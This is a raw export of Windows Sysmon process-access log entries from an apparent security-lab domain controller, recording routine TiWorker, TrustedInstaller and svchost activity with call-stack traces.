13:58:30.336{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.320{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.320{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.320{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.320{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.320{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.305{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.305{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.305{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.289{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.289{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.289{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.289{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.273{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.242{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.242{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.226{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.211{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 